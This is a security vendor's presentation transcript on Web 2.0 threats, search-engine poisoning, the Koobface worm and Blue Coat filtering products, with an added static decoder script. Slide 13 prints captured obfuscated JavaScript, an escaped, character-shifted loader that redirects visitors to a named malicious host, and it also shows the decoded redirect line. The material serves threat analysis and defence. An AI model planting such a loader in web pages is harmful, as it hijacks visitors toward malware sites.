Living in a Web 2.0 World (and how BCSI can help!)

Living in a Web 2.0 World (and how BCSI can help!). Mark Stanford SE Manager. 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net. Agenda. Definition of Web 2.0 Overview Real World Web 2.0 application and threat examples

Presentation Transcript


  1. Living in a Web 2.0 World (and how BCSI can help!) Mark Stanford SE Manager 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net

  2. Agenda • Definition of Web 2.0 • Overview • Real World Web 2.0 application and threat examples • BCSI countermeasures: Layered Security Defenses

  3. What is Web 2.0? • Applications & Services • Technologies & Programming Languages • Software & Systems

  4. Web Evolution • Static Pages → Dynamic Pages • Dynamic Pages → Interactive Pages • Publishing Model → Community Model • Single Host Pages → Multi-Host Pages • Nice to Have → Must Have

  5. Cyber Crime Evolution • Wide-spread, Fast → Targeted • Visible, DoS → Invisible • Damage/Defacement → Data Collection/Identity • Ingenuity/Pride Driven → Profit Driven • Amateurs → Professionals

  6. Web 2.0 • Did NOT change… the OSI model; the way IP addresses work; the way URLs are handled; the way Web Filtering works • DID change… how information gets posted, even legitimate sites; how information may be presented • By 2012 the Internet will be 75X larger than in 2002 • What is required to find/identify threats on the web

  7. Web 2.0 Also Means 1 URL Leads to Many • 12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time) • 12 Domains, 246 URLs (www.bild.de, 31.03.2010, 10:17 a.m. German Time)

  8. Web 2.0 and Search Engines • Forums • Blogs • Wikis • Guestbooks • www • Search Engine View

  9. Malware Case Study

  10. WebPulse • WebPulse saw a new referrer…

  11. Nothing here… <html><head><title>Install Keys Satellite</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta http-equiv="Content-Language" content="en-us" /> <meta name="robots" content="index, follow" /> </head><body bgcolor=#59746> <style> body { font-family: verdana; margin: 10px 100px; } </style> <h3>Install Keys Satellite</h3> <strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: 16px;">have vb setup install jmail</font> axle install hellwig ghetto install s forum apron front sink install <u>tiger wood install</u> <b>install cobra fatty freeway bars</b> plasma install <strong>adaptec tape install</strong> <font color=#7B6DAC style="font-size: 12px;">remote install software</font> cnps 9500 install install modular plug rj45 <strong>can't install program</strong> <font color=#68D71E size=14>how to install neon tubes</font> <i>how to install themes for mac</i> 2003 install microsoft office <i>msdos install system</i> <b>software install through active directory</b> install vcr to dish network <strong>nero startsmart install error</strong> <b>blat install syntax</b> <i>dell workstation 360n install cpu</i> install setup install tunnel protectors <u>project 2007 how to install</u> <font color=#D8B88A style="font-size: 18px;">self install fire pit</font> <strong>install grub dual boot</strong> <b>deluxe install prizm pro</b> <b>how to install a window shutter</b> <b>install laminate over existing counter top</b> <font color=#41FE63 style="font-size: 12px;">linksys 54g install</font>

  12. So… How did the User get there?

  13. <script language="javascript"> function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));} </script> Interesting… <html><head><title>Install Keys Satellite</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta http-equiv="Content-Language" content="en-us" /> <meta name="robots" content="index, follow" /> </head><body bgcolor=#59746> <script language="javascript"> document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1'); </script> <style> body { font-family: verdana; margin: 10px 100px; } </style> <h3>Install Keys Satellite</h3> <strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: 
<script> document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169"; </script>
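
The decoding step shown on slide 13, as an added example that is not part of the original presentation: a static decoder for Node.js that mirrors dF(), finds dF('...') calls in page source and lists the redirect targets without evaluating anything. The sample page and its example.test URL are constructed for illustration, and findDfPayloads, extractRedirects, hostOf and analyze are hypothetical helper names.

```javascript
// Added example (not from the presentation): static decoder for the dF()
// obfuscation on slide 13. The page is handled as text; nothing is executed.

// Constructed sample, not the captured page: same encoding, shift key 1,
// redirect target on the reserved example.test domain.
const SAMPLE_HTML =
  "<body><script>dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00" +
  "mboejoh/fybnqmf/uftu0jo/qiq%264Gje%264E8%2633%264C%264D0tdsjqu%264F1');" +
  "</script><h3>Install Keys Satellite</h3></body>";

// Mirror of dF(): the last character is a decimal shift key; the rest is a
// percent-escaped string whose characters were each shifted up by that key.
function decodeDF(s) {
  const keyChar = s.slice(-1);
  if (!/^[0-9]$/.test(keyChar)) throw new Error("payload does not end in a digit key");
  const shifted = unescape(s.slice(0, -1));
  let t = "";
  for (let i = 0; i < shifted.length; i++) {
    t += String.fromCharCode(shifted.charCodeAt(i) - Number(keyChar));
  }
  return unescape(t); // the original hands this string to document.write()
}

// Hypothetical helper: collect the string argument of every dF('...') call.
function findDfPayloads(html) {
  return [...html.matchAll(/\bdF\(\s*(['"])(.*?)\1\s*\)/g)].map((m) => m[2]);
}

// Hypothetical helper: redirect targets assigned to location / location.href.
function extractRedirects(js) {
  return [...js.matchAll(/\blocation(?:\.href)?\s*=\s*(['"])(.*?)\1/g)].map((m) => m[2]);
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; } // relative or malformed
}

// Decode every payload and report where it would send the browser.
function analyze(html) {
  return findDfPayloads(html).map((payload) => {
    const decoded = decodeDF(payload);
    const redirects = extractRedirects(decoded);
    return { decoded, redirects, hosts: redirects.map(hostOf) };
  });
}

console.log(JSON.stringify(analyze(SAMPLE_HTML), null, 2));
```

The hosts it reports are what a gateway would need to rate in order to block the final hop, which the keyword-stuffed landing page alone does not reveal.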

  14. “A friendly piece of advice…”

  15. “You are in trouble…”

  16. “This is very serious”

  17. Web 2.0 Examples - Twitter • Still a toy or already a tool?

  18. Web 2.0 Examples - Mashups

  19. Web 2.0 Examples - Facebook • Still a toy or already a tool?

  20. Koobface worm (January 2009) • Invitation to click on a link in Facebook or Myspace in-box • Supposedly a link to a funny video • Users were told that they had to update their Flash player to view the video • The installed software was a proxy server • Now selected traffic could be redirected to the attacker • A second program to download and install arbitrary code was installed, too → Like magic, the infected computer is now a zombie, under the control of unknown villains

  21. Changing Web Habits • Top 10 Categories – 2009 • WebFilter/WebPulse, 62M+ Users • 1. Social Networking • 2. Web Advertisements • 3. Search Engines/Portals • 4. Personals/Dating • 5. Pornography • 6. Computers/Internet • 7. Audio/Video Clips • 8. Adult/Mature Content • 9. Web Email • 10. Illegal/Questionable • Social Networking: Moved to #1 from #2 position; Represents 25% of Top10 requests • Web Email: Dropped to #9 from #5 position; Users migrating to social networking • Cyber Crime Leverages: Search engine poisoning; Fake AV and Codec updates; Popular site injections; Death, Drama & Disaster lures; Health & Wealth scams

  22. Layered Security Defenses

  23. Blue Coat Layered Defenses

  24. Hybrid Design • WebFilter • ProxySG & ProxyAV • Architected to Deliver On-Demand Security Intelligence • URL Filtering & Reporting • Cloud threat protection • Cloud Defenses • Real-time web content ratings • Web threat & malware detection • Reputation ratings • ProxyClient • Remote Users • Web Gateway Protection • Inline threat analysis w/SSL • Web filtering & content controls • Media optimization + B/W Mgmt • WebPulse • Reporter • WAN • Web • Industry’s leading collaborative cloud defense with 62M users • Real-time inputs of any new web content and dynamic links • Web protection, visibility, and reporting in any location

  25. WebPulse Malware Scanning Data Types Protocol Compliance Content Filters Active Content URL Filtering AAA Policy Method Controls Certificate Validation BCWF Log Files Reporter Blue Coat Secure Web Gateway Object Cache • ProxyAV: • Behavior based analysis • Signatures Bandwidth Management Protocol Optimization

  26. BCWF Malware Identification Strategy: Dynamic Link Analysis • Popular Web Site Pointers • Middle Relay Servers & Link Farms • Malware Download Hosts A C B Preserve Productivity

  27. Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL chain for threats & rating • Update master database in cloud to protect all members Cloud Community

  28. Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL for threats & rating • Update master database in cloud to protect all members Cloud Community

  31. Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of full link chain for threats & rating • Update master database in cloud to protect all members Cloud Community Protects Web Gateways Remote Users

  32. WebPulse: First Complete DLA solution • New defense layer • Full Dynamic link analysis • Foundation for next generation URL filtering • Fast, Aware, Protective… for anyone, anywhere Cloud Community Protects WebPulse 62M Users ProxySG 2B reqs/week WebFilter Web Gateways ProxyClient K9 Remote Users

  33. Deep Background Rating Analysis (DBRA) • 2 Secs – 2hrs • RTT Balanced URL & Content Trainers URL Malware Real Time Boundary WebPulse Cloud Service ANZ Threat Analysis • 16 Sources • Signatures • Behavior • Heuristics • Reputation • Sandboxing Master Rating Database • Rating Servers • 300M Unique requests daily • 1.2B requests “rated” weekly • 50 languages • Fast (ms) – try it! VA HK UK CA WebPulse Clients Dynamic URL Cache BCWF Full List Dynamic URL Cache Dynamic URL Cache • “Uncategorized” sent to WebPulse for • Dynamic categorization • 62M+ User Community • 45B+ requests/week • Fully Configurable and Secure • 5 Min for security updates BCWF Full List ProxyAV ProxySG ProxyClient K-9 Web Protect

  34. Dual Cache Design Clean Object Cache Finger Print Cache ProxyAV: Co-Processor Architecture • Improved utilization with M:N ratio • Higher throughput per gateway • Results in less hardware (with new AV HW: always 1 SG – 1 AV sizing possible) • Optimized design ProxyAV ICAP, ICAP+, S-ICAP Internet Enterprise Network • Patience Page • Trickle First • Trickle Last • Defer Scan (media) ProxySG

  35. ProxyAV – anti-malware features • Don’t get confused by the name “AV” • Anti-malware features are more comprehensive than traditional pattern matching technologies: Behavioral analysis; Sandboxing; Heuristics; True file type detection; Etc. • ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249). Note: Finjan was not able to block the exploit without a security update → It is a different approach and philosophy

  36. ProxyClient included with WebFilter • Remote Filtering • Cloud Connected • Threat Protection • Acceleration • Central Policy • Reporting

  37. Why Blue Coat Products? • Unmatched policy controls & authentication options • Proactive Malware/MMC detection • Real-time web content analysis/DLA for gateway & client • URL database, threat detection, and DLP partners • Custom object-based OS with patented cache technologies • Broad proxy library & acceleration techniques • Bandwidth management & protocol optimization/compliance • Experience, Reliability, Performance All the RIGHT parts! Blue Coat Confidential Information

  38. Questions?
